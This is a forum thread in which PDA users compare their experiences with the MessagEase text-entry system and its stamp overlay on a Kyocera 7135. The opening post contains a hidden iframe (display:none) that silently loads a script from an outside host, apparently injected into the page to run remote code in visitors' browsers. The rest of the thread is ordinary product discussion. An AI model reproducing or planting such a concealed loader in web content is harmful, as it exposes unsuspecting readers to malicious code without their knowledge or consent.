+ Reply to Thread

Thread: Messagease

Messagease

Has anyone tried the text entry system of Messgease (www.messagease.com). I realize there's another learning curve here, but it seems good, has macros, and has received lots of strongly positive feedback. I'm getting tired of waiting for silkyboard. And while I type fast with a qwerty keyboard, this looks quite fast once learned....<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

MessageEase is an awesome text entry tool. Faster than anything except probably a treo thumboard once you learn it (it's really not that hard once you get the concept down). However, I don't know if anybody has tried it on the 7135 yet (I use it on my Handera using the virtual MesseageEase overlay).

Oh, and by the way, you really want the Stamp version of MessageEase once you get the concept down.

Tried it for 2 days & I like it w/Textplus. Hope the Kyocera skin works on the 7135..

I dunno, I was just starting to get comfortable with Graffitti! I tried their online demo and it didn't seem very intuitive to me.

I'm also using it with Textplus. I ordered the stamp. Takes a bit of getting used to, but it's fast, and the macros are quite powerful. Support is also excellent (including user group on yahoo).

Originally posted by pdadoc
    I'm also using it with Textplus. I ordered the stamp. Takes a bit of getting used to, but it's fast, and the macros are quite powerful.
    Textplus does get in the way though. Did you configure it to be less obstrusive?
    Originally posted by pdadoc
    Support is also excellent (including user group on yahoo).
    Yeah. That impressed me since there are over 1500 people on the list. There has to be something to a product like that so I gave it a chance. It is faster than grafitti am I am very, very good at grafitti.

Will the Kyocera stamp (not skin) work with the 7135s? I put that question in my order and they didn't answer yet.

Got the stamp today. (MEST100- the one for "kyocera" and some others as well). Since it's not made exclusively for the 7135, the fit needs some adjustment. I found thas simply cutting off a small strip on either side (which does not at all interfere with any showing icons or function) leads to a perfect fit. Works great.

Messagease

I tried to open the file that contains the hack that turns the Kwerty keyboard on the palm into the messageease keyboard. The error I got when I tried to open it on the Kyo was "needs version 5 or over". What's weird is nowhere on the website does it state this. Has anyone succesfully found a way to do this? Right now the only way to see the keyboard in on the screen itself.

Also, how do you get all the apps to default to messagease?

Thanks in advance.
    Tracey

MessagEase - going great

Hello,

I recently installed MessagEase on my 7135. Ordered and installed stamp, too. It's only been about two weeks and I am loving it. I thought I was quick with Graffiti, but MessagEase is quicker, with far fewer mistakes. Forcing myself to keep practicing it each night, because it does take time and patience to learn. But this is one nifty system.

Just wanted to pass this along, in case anyone is looking for an alternative to Graffiti II or Jot.